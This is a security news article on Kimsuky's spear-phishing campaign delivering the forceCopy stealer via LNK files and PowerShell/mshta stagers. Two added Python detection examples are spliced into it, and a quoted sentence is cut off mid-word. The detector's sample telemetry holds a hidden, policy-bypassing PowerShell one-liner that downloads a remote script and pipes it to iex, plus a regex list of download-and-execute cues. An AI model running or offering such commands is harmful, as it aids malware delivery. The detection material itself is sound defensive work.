Kimsuky Hackers Deploy forceCopy Malware in Spear-Phishing Attacks


North Korea-linked hacking group Kimsuky has been identified conducting targeted spear-phishing campaigns to distribute an information stealer known as forceCopy, according to the latest findings from the AhnLab Security Intelligence Center (ASEC).
The attacks begin with phishing emails carrying a Windows shortcut (LNK) file disguised as a Microsoft Office or PDF document. When the shortcut is opened, it launches PowerShell or mshta.exe (a legitimate Microsoft binary that runs HTML Application (HTA) files), which then downloads and executes additional malware from an external server.
According to ASEC, the attack chain ultimately leads to the deployment of PEBBLEDASH, a well-known trojan, and a customized build of RDP Wrapper, an open-source Remote Desktop utility.
Additionally, the attackers utilize proxy malware, which enables them to maintain persistent Remote Desktop Protocol (RDP) communication with external networks.
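The LNK-to-PowerShell/mshta stager chain described above leaves a recognisable footprint in process-creation telemetry. The following is an added detection example, not code from ASEC or from the article: it runs a simple heuristic over constructed Sysmon-style events (paths, hostnames and command lines are placeholders) and flags mshta.exe or PowerShell launches that combine an explorer.exe parent (the usual parent when a user double-clicks a shortcut, since the .lnk itself is not recorded as a process) with a remote URL or download/hidden-execution switches on the command line.

```python
"""Heuristic detection of LNK -> mshta.exe / PowerShell stager launches.

Added example: the event records below are constructed for the demo and do
not come from the article or from real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon event ID 1 / EDR style)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry; the .invalid TLD guarantees the URLs resolve nowhere.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://example-stager.invalid/doc.hta"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -ep bypass -c "iwr http://example-stager.invalid/p.ps1 | iex"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\u\report.docx"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Windows\Temp\local.hta"),
]

# Living-off-the-land binaries the article names as the stager.
STAGER_BINARIES = {"mshta.exe", "powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Switches and cmdlets typical of a one-liner that fetches and runs a remote payload.
# Word boundaries keep "iex" from matching "iexplore".
DOWNLOAD_CUES = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b"
    r"|-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons an event looks like a stager launch (empty list = benign).

    Two independent signals are required so that a lone PowerShell launch
    from the shell does not fire on its own.
    """
    if basename(ev.image) not in STAGER_BINARIES:
        return []
    reasons = []
    if basename(ev.parent_image) == "explorer.exe":
        reasons.append("launched from explorer.exe (user double-click, e.g. an LNK file)")
    if URL_RE.search(ev.command_line):
        reasons.append("remote URL in command line")
    if DOWNLOAD_CUES.search(ev.command_line):
        reasons.append("download / hidden-execution switches in command line")
    return reasons if len(reasons) >= 2 else []


def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Run classify() over a batch of events and keep only the hits."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.append((ev.command_line, reasons))
    return hits


if __name__ == "__main__":
    for cmd, reasons in scan(SAMPLE_EVENTS):
        print(f"SUSPICIOUS: {cmd}")
        for r in reasons:
            print(f"    - {r}")
```

Of the four constructed events, only the two explorer-spawned launches that reach out to a URL are reported; the Word launch is not a stager binary, and the mshta.exe run against a local HTA from cmd.exe carries a single weak signal and is left alone. In production the same logic would run over a SIEM query rather than an in-memory list, and the regex cue list is the part that needs tuning against your own fleet's administrative scripts.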
Kimsuky has also been observed employing a PowerShell-based keylogger to capture keystrokes and a new stealer malware, forceCopy, designed to extract files from directories linked to web browsers.
“All of the paths where the malware is installed are web browser installation paths,” ASEC noted. “It is assumed tha
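ASEC's observation that the implants sit inside web browser installation paths suggests a second, complementary check: any executable image that runs from under a browser's install root but is not the browser itself deserves a look. The block below is an added example, not ASEC's or the article's code; the install roots and allowlists are an assumed baseline that a real deployment would build from its own inventory, and the sample image paths are constructed.

```python
"""Flag processes running from a browser installation directory that are not the browser.

Added example. The install roots, allowlists and sample paths below are
assumptions constructed for the demo, not data from the article.
"""

# Assumed baseline: install root -> executables expected to run from that root.
BROWSER_INSTALL_ROOTS = {
    r"C:\Program Files\Google\Chrome\Application": {"chrome.exe"},
    r"C:\Program Files (x86)\Microsoft\Edge\Application": {"msedge.exe"},
    r"C:\Program Files\Mozilla Firefox": {"firefox.exe"},
}

# Constructed sample process image paths.
SAMPLE_IMAGES = [
    r"C:\Program Files\Google\Chrome\Application\chrome.exe",
    r"C:\Program Files\Google\Chrome\Application\svchost.exe",  # name borrowed from a system binary
    r"C:\Windows\System32\svchost.exe",
    r"C:\Program Files\Mozilla Firefox\updater.exe",            # shows why the allowlist needs baselining
]


def browser_root_for(image: str):
    """Return (root, allowed_names) if the image lives under a known browser root, else None.

    Comparison is case-insensitive and requires a path separator after the
    root so that "...\\Firefox2\\x.exe" does not match "...\\Firefox".
    """
    low = image.lower()
    for root, allowed in BROWSER_INSTALL_ROOTS.items():
        if low.startswith(root.lower() + "\\"):
            return root, allowed
    return None


def check_image(image: str):
    """Return a finding string for an unexpected binary under a browser root, else None."""
    hit = browser_root_for(image)
    if hit is None:
        return None
    root, allowed = hit
    name = image.rsplit("\\", 1)[-1].lower()
    if name in allowed:
        return None
    return f"{name} executed from browser install root {root}"


def scan_images(images: list[str]) -> list[tuple[str, str]]:
    """Apply check_image() to each path and keep the findings."""
    findings = []
    for image in images:
        finding = check_image(image)
        if finding:
            findings.append((image, finding))
    return findings


if __name__ == "__main__":
    for image, finding in scan_images(SAMPLE_IMAGES):
        print(f"REVIEW: {finding}")
```

Two of the four constructed paths are reported. The copy of a system binary name under the Chrome root is the kind of hit the check is for; the Firefox updater hit is a deliberate false positive, there to show that the allowlist has to be baselined against legitimate updater and installer binaries before the rule is allowed to page anyone.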

[…]

This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents
